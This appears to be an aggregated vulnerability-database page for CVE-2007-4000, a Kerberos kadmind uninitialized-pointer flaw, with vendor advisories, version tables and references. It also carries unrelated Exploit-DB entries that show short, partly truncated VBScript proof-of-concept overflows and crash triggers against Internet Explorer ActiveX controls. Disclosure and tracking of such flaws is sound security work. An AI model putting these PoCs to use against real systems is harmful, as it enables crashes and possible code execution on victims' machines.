CVE-2007-4000
Published 2007-09-05
Priority: P345 · Severity: high · CVSS 2.0 base score 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
EPSS: 6.14% (92.6th percentile)
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | krb5 | < krb5 1.6.dfsg.1-7 (bookworm) | krb5 1.6.dfsg.1-7 (bookworm) |
| fedoraproject | fedora | — | — |
| mit | kerberos_5 | 1.5 – 1.6.2 | — |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 8.5 | HIGH | AV:N/AC:M/Au:S/C:C/I:C/A:C |
| osv | — | 8.5 | HIGH | — |
| vendor_debian | — | 8.5 | HIGH | — |
| vendor_redhat | — | 8.5 | HIGH | — |
SonicWall
CVE-2007-5815 [CRITICAL] CWE-22 · vendor_sonicwall · 2007-11-05 · CVSS 10.0
Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before 2.5, allows remote attackers to delete arbitrary files via a full pathname in the argument to the FileDelete method.
Red Hat
CVE-2007-4000 [HIGH] krb5 kadmind uninitialized pointer · vendor_redhat · 2007-09-04 · CVSS 8.5
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
Debian
CVE-2007-4000 [HIGH] krb5 · vendor_debian · 2007 · CVSS 8.5
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
Scope: local
bookworm: resolved (fixed in 1.6.dfsg.1-7)
bullseye: resolved (fixed in 1.6.dfsg.1-7)
forky: resolved (fixed in 1.6.dfsg.1-7)
sid: resolved (fixed in 1.6.dfsg.1-7)
trixie: resolved (fixed in 1.6.dfsg.1-7)
GHSA
GHSA-rjp4-vqhr-2249 (CVE-2007-4000) [HIGH] CWE-824 · ghsa_unreviewed · 2022-05-01
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
OSV
CVE-2007-4000 [HIGH] · osv · 2007-09-05 · CVSS 8.5
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
No detection rules found.
Exploit-DB
CVE-2007-3554: HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
exploitdb · 2007-07-02
---
HP Instant Support - Driver Check Remote Buffer Overflow Exploit
author: Carlo Di Dato (aka shinnai)
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with IE7
Special thanks to:
rgod for his support and friendship
John Morris from HP Software Security for his honesty
str0ke... for being str0ke :)
HP Security Bulletin:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
```
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1
```
Exploit-DB
CVE-2007-2981: LeadTools Raster OCR Document Object Library - Memory Corruption
exploitdb · 2007-05-30
---
2007/05/26
LeadTools Raster OCR Document Object Library (ltrdc14e.dll v. 14.5.0.44) Remote Memory corruption Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at their site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
All software that uses this OCX is vulnerable to this exploit.
```
Sub tryMe
    buff = String(4000, "A")
    test.DictionaryFileName = buff
End Sub
```
# milw0rm.com [2007-05-30]
Exploit-DB
CVE-2007-2623: Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service
exploitdb · 2007-05-10
---
2007/05/10
RControl.dll v. 1.2.1.0 Denial of Service Exploit
url: http://www.fruit2004.com/
price: only $20 :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
If you try less than 4000 chr you'll see a strange crash. It seems like a
heap overflow in ntdll.dll but I'm really not sure of this thing :)
Connect
InternalServer
Quoting...
```
Sub tryMe
    on error resume next
    Dim MyMsg
    if Pucca.value = "Connect" then
        argCount = 5
        arg1=String(8001,"A")
        arg2=1
        arg3="default"
        arg4="default"
        arg5="default"
        target.connect arg1, arg2, arg3, arg4, arg5
    elseif Pucca.value = "InternalServer" then
        argCount = 1
        arg1=Strin
```
Exploit-DB
CVE-2007-2563: Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
exploitdb · 2007-05-07
---
2007/05/07
Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow
url: http://en.versalsoft.com/
price: from $59.95 to $799.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Try only 1500 characters (or less) to see IE crash.
```
Sub tryMe
    on error resume next
    arg1 = String (4000,"A")
    target.AddFile arg1
End Sub

Sub QuoteMe
    Dim MyMsg
    MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
        "I'm really out to sea" & vbCrLf & _
        "This kettle is boiling over" & vbCrLf & _
        "I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
End Sub
```
As y
Exploit-DB
CVE-2007-2210: NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities
exploitdb · 2007-04-17
---
source: https://www.securityfocus.com/bid/23535/info
NetSprint Ask IE Toolbar ActiveX control is prone to multiple denial-of-service vulnerabilities.
Exploiting these issues allows remote attackers to crash applications that employ the vulnerable controls (typically Microsoft Internet Explorer). Attackers may potentially exploit these issues to execute code, but this has not been confirmed.
NetSprint Ask IE Toolbar 1.1 is vulnerable; other versions may also be affected.
```
arg=String(4000, "A")
target.AddAllowed arg
```
Exploit-DB
CVE-2007-3554: HP Instant Support - ActiveX Control Driver Check Buffer Overflow
exploitdb · 2007-04-01
---
source: https://www.securityfocus.com/bid/24730/info
HP Instant Support ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting this issue allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.
```
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1 + second_exception + fir
```
References
http://secunia.com/advisories/26676
http://secunia.com/advisories/26680
http://secunia.com/advisories/26700
http://secunia.com/advisories/26728
http://secunia.com/advisories/26783
http://secunia.com/advisories/26987
http://securityreason.com/securityalert/3092
http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-006.txt
http://www.gentoo.org/security/en/glsa/glsa-200709-01.xml
http://www.kb.cert.org/vuls/id/377544
http://www.mandriva.com/security/advisories?name=MDKSA-2007:174
http://www.novell.com/linux/security/advisories/2007_19_sr.html
http://www.redhat.com/support/errata/RHSA-2007-0858.html
http://www.securityfocus.com/archive/1/478794/100/0/threaded
http://www.securityfocus.com/bid/25533
http://www.securitytracker.com/id?1018647
http://www.vupen.com/english/advisories/2007/3051
https://bugzilla.redhat.com/show_bug.cgi?id=250976
https://exchange.xforce.ibmcloud.com/vulnerabilities/36438
https://issues.rpath.com/browse/RPL-1696
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9278
https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00087.html